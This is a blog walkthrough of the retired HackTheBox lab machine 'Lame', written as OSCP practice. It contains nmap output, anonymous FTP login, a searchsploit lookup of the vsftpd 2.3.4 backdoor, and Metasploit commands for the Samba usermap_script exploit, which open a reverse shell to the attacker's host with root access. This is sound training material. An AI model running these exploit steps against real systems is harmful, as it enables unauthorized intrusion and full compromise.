Post

Lame

Posted Updated
Preview Image
By 1ntell0
6 min read
Lame

This is a retired box from HackTheBox(HTB). Being part of TJnull’s list for OSCP Preparation. I had to tackle it.

Intelligence Gathering

Let’s look at open ports.

1
2
3
4
5

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack ttl 63
22/tcp  open  ssh          syn-ack ttl 63
139/tcp open  netbios-ssn  syn-ack ttl 63
445/tcp open  microsoft-ds syn-ack ttl 63

let’s get the service version and run some default nmap script of these open ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OS: Unix

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 31947/tcp): CLEAN (Timeout)
|   Check 3 (port 15886/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Enumeration

FTP Enumeration

With FTP, there is a way to log in with default credentials anonymous:anonymous. As shown below, these creds gave us access to the victim’s FTP server.

1
2
3
4
5
6
7
8
9
10

➜  ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:retr0x01): anonymous
331 Please specify the password.
Password: **anonumous(Not shown on the screen)**
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Although we logged in, we were not able to find anything on the FTP server.

Let’s find the vulnerability belonging to the version of the service we found earlier. After some googling we found the exploit for this version of FTP.

1
2
3
4
5
6
7
8
9
10
11
12

➜  searchsploit vsftp
--------------------------------------------------------------------------------- ------------------------------
 Exploit Title                                                                    |  Path
--------------------------------------------------------------------------------- ------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                    | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                    | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                    | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                  | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution                                         | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                            | unix/remote/17491.rb
vsftpd 3.0.3 - Remote Denial of Service                                           | multiple/remote/49719.py
--------------------------------------------------------------------------------- ------------------------------

We have two ways to exploit this vulnerability. Let’s get it in our host and exploit it.

1
2
3
4
5
6
7
8
9
10

➜  searchsploit vsftp -m 49757
[!] Could not find EDB-ID #

  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /snap/searchsploit/62/opt/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/Lame/Exploitation/vsftpd_2.3.4_Exploit/49757.py

The exploit did not seem to work manually. Let’s go with the automated way, using the metasploit framework (MSF).

1
2
3
4
5
6
7
8
9
10

#Firstly, we search for the exploit on msf
msf6 > search vsftp
#Secondly, we use the exploit
msf6 > use 0
#Third, we check the options needed to run the exploit
msf6 > show options
#Fourth, we set the needed arguments
msf6 > set rhosts 10.10.10.3
#Finally we run the exploit
msf6 > exploit

After waiting for some time, the exploit did not run successfully as shown here.

1
2
3
4
5

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

let’s carry on and try another service enumeration.

SMB Enumeration

SMB or Samba, is also known to be easy to enumerate. Let’s start our enumeration on this service. First let’s see what kind of share we have on this SMB server using smbmap.

1
2
3
4
5
6
7
8
9

➜  smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: 10.10.10.3                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

As we can see using smbmap, we can check different shares and also we can know the permission we have for all the shares. From what we can see here, we have read and write access on the /tmp share. Let’s enumerate that share. using the regular anonymous method to enumerate the Samba server did not get us anywhere. After some googling, we found this article and it helped us exploit the vulnerability of these SMB versions.

User & Privesc

This was lame for a reason, because this vulnerability gives root access right off the bat. So no need to gain user first and try to escalate privileges. Just getting in with super user privileges.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

#Firstly, we search for the exploit on msf
msf6 > search samba 3
#Secondly, we use the exploit
msf6 > use exploit/multi/samba/usermap_script
#Third, we check the options needed to run the exploit
msf6 > show options
#Fourth, we set the remote host
msf6 > set rhosts 10.10.10.3
#Fifth, we set our local interface or address
msf6 > set lhost tun0
#Finally, run the exploit
msf6 > exploit
#Results
msf6 exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP handler on 10.10.16.8:4444 
[*] Command shell session 1 opened (10.10.16.8:4444 -> 10.10.10.3:55027) at 2023-01-19 03:17:00 -0600

whoami
root
pwd
/

The box is done, Since we have the higher privilege there is nothing else to do at this point expect navigate and get the differents flag. It was lame because of the rabbit hole and the exploitation. But a great box overall.

Thanks for reading me, enjoy !

OSCP Prep, HTB Linux Retired
Network Outdated Software Security Tools Remote Code Execution SAMBA Common Services
This post is licensed under CC BY 4.0 by the author.